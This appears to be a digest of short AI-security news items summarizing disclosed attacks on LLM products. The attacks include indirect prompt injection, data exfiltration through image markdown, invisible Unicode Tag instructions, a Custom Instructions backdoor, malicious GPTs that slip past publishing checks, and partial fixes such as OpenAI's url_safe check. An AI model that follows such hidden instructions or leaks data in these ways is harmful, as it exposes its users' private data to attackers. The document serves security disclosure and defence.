New tools, products, platforms, funding rounds, and company developments in AI security.
Google Bard gained a code interpreter feature that lets it run Python code to create charts and perform calculations. The feature works by executing code in a sandboxed environment (an isolated virtual computer), which users can trigger by asking Bard to visualize data or plot results. While exploring this sandbox, the author found it to be somewhat unreliable and less capable than similar features in other AI systems, with limited ability to run arbitrary programs.
A researcher discovered that Amazon Q for Business was vulnerable to an indirect prompt injection attack (a technique where an attacker hides malicious instructions in data that gets fed to an AI), which could trick the AI into outputting markdown tags that render as hyperlinks. This allowed attackers to steal sensitive data from victims by embedding malicious links in uploaded files. Amazon identified and fixed the vulnerability after the researcher reported it.
OpenAI has begun addressing a data exfiltration vulnerability (where attackers steal user data) in ChatGPT that exploits image markdown rendering during prompt injection attacks (tricking an AI by hiding instructions in its input). The company implemented a client-side validation check called 'url_safe' on the web app that blocks images from suspicious domains, though the fix is incomplete and attackers can still leak small amounts of data through workarounds.
Google Cloud's Vertex AI Generative AI Studio had a data exfiltration vulnerability caused by image markdown injection (a technique where attackers embed hidden commands in image references to steal data). The vulnerability was responsibly disclosed to Google and has been fixed.
LLM applications like chatbots are vulnerable to data exfiltration (unauthorized data theft) through image markdown injection, a technique where attackers embed hidden instructions in untrusted data to make the AI generate image tags that leak information. Microsoft patched this vulnerability in Azure AI Playground, though the source does not describe the specific technical details of their fix.
An indirect prompt injection attack (tricking an AI into following hidden instructions in its input) can allow an attacker to steal chat data from ChatGPT users by either having the AI embed information into image URLs (image markdown injection, which embeds data into web links displayed as images) or convincing users to click malicious links. ChatGPT Plugins, which are add-ons that extend ChatGPT's functionality, create additional exfiltration risks because they have minimal security review before being deployed.
This is a minor update to the Llama repository that makes download.sh (a script file used to download files) executable and adds error handling so the script stops running if it encounters a problem. The change was submitted as a pull request to improve the reliability of the download process.
A researcher discovered data exfiltration vulnerabilities (security flaws that allow unauthorized data to leak out of a system) in several popular AI chatbots including Bing Chat, ChatGPT, and Claude, and responsibly disclosed them to the companies. Microsoft, Anthropic, and a plugin vendor fixed their vulnerabilities, but OpenAI decided not to fix an image markdown injection issue (a vulnerability where hidden code in image formatting can trick the AI into revealing data).
OpenAI removed the 'Chat with Code' plugin from its store after security researchers discovered it was vulnerable to CSRF (cross-site request forgery, where an attacker tricks a system into making unwanted actions on behalf of a user). The vulnerability allowed ChatGPT to accidentally create GitHub issues without user permission when certain plugins were enabled together.
A researcher discovered that LLMs like ChatGPT can be tricked through prompt injection (hiding malicious instructions in input text) by using invisible Unicode characters from the Tags Unicode Block (a section of the Unicode standard containing special code points). The proof-of-concept demonstrated how invisible instructions embedded in pasted text caused ChatGPT to perform unintended actions, such as generating images with DALL-E.
A security researcher presented at the 37th Chaos Communication Congress about Large Language Models Application Security and prompt injection (tricking an AI by hiding instructions in its input). The talk covered security research findings and was made available in video and slide formats for public access.
Fix: OpenAI implemented a mitigation by adding a client-side validation API call (url_safe endpoint) that checks whether image URLs are safe before rendering them. The validation returns {"safe":false} to prevent rendering images from malicious domains. However, the source explicitly notes this is not a complete fix and suggests OpenAI should additionally "limit the number of images that are rendered per response to just one or maybe a handful maximum" to further reduce bypass techniques. The source also notes the current iOS version 1.2023.347 (16603) does not yet have these improvements.
Embrace The RedA researcher demonstrated that malicious GPTs (custom ChatGPT agents) can secretly steal user data by embedding hidden images in conversations that send information to external servers, and can also trick users into sharing personal details like passwords. OpenAI's validation checks for publishing GPTs can be easily bypassed by slightly rewording malicious instructions, allowing harmful GPTs to be shared publicly, though the researcher reported these vulnerabilities to OpenAI in November 2023 without receiving a fix.
A security researcher presented at Ekoparty 2023 about prompt injections (attacks where malicious instructions are hidden in inputs to trick an AI into misbehaving) found in real-world LLM applications and chatbots like ChatGPT, Bing Chat, and Google Bard, demonstrating various exploits and discussing mitigations. The talk covered both basic LLM concepts and deep dives into how these attacks work across different AI platforms.
Google Bard's new Extensions feature allows it to access personal data like YouTube videos, Google Drive files, Gmail, and Google Docs. Because Bard analyzes this untrusted data, it is vulnerable to indirect prompt injection (a technique where hidden instructions in documents trick an AI into performing unintended actions), which a researcher demonstrated by getting Bard to summarize videos and documents.
This article is a trip report from HITCON CMT 2023, a security conference in Taiwan, where the author attended talks on various topics including LLM security, reverse engineering with AI, and application exploits. Key presentations covered indirect prompt injections (attacks where malicious instructions are hidden in data fed to an AI system), Electron app vulnerabilities, and PHP security issues. The author gave a talk on indirect prompt injections and notes this technique could become a significant attack vector for AI-integrated applications like chatbots.
An attacker can use indirect prompt injection (tricking an AI by hiding malicious instructions in data it reads) to make an LLM call its own tools or plugins repeatedly in a loop, potentially increasing costs or disrupting service. While ChatGPT users are mostly protected by subscription pricing, call limits, and a manual stop button, this technique demonstrates a real vulnerability in how LLM applications handle recursive tool calls.
Fix: The source mentions that Microsoft (Bing Chat), Anthropic (Claude), and a plugin vendor addressed and fixed their respective vulnerabilities. However, OpenAI's response to the reported vulnerability was "won't fix," meaning no mitigation from OpenAI is described in the source text.
Embrace The RedAnthropic patched a data exfiltration vulnerability in Claude caused by image markdown injection, a technique where attackers embed hidden instructions in image links to trick the AI into leaking sensitive information. While Microsoft fixed this vulnerability in Bing Chat and OpenAI chose not to address it in ChatGPT, Anthropic implemented a mitigation to protect Claude users from this attack.
ChatGPT has a vulnerability where attackers can use image markdown (a way to embed images in text) to trick the system into leaking data. OpenAI recently added Custom Instructions, a feature that automatically adds instructions to every message, which attackers can abuse to install a persistent backdoor (hidden access point) that steals data through the image markdown vulnerability. This technique is similar to how attackers exploit other systems by enabling features like email forwarding after they gain initial access.
Google Bard can be tricked through image-based prompt injection (hidden instructions placed in images that the AI then follows), as demonstrated by a researcher who embedded text in an image that caused Bard to perform unexpected actions. This vulnerability shows that AI systems that analyze images may be vulnerable to indirect prompt injection attacks (tricking an AI into ignoring its normal instructions by hiding malicious commands in user-provided content).
Google Docs recently added new AI features, such as automatic summaries and creative content generation, which are helpful but introduce security risks. The main concern is that using these AI features on untrusted data (information you don't know the source or reliability of) could lead to unwanted consequences, though currently attackers have limited ways to exploit these features.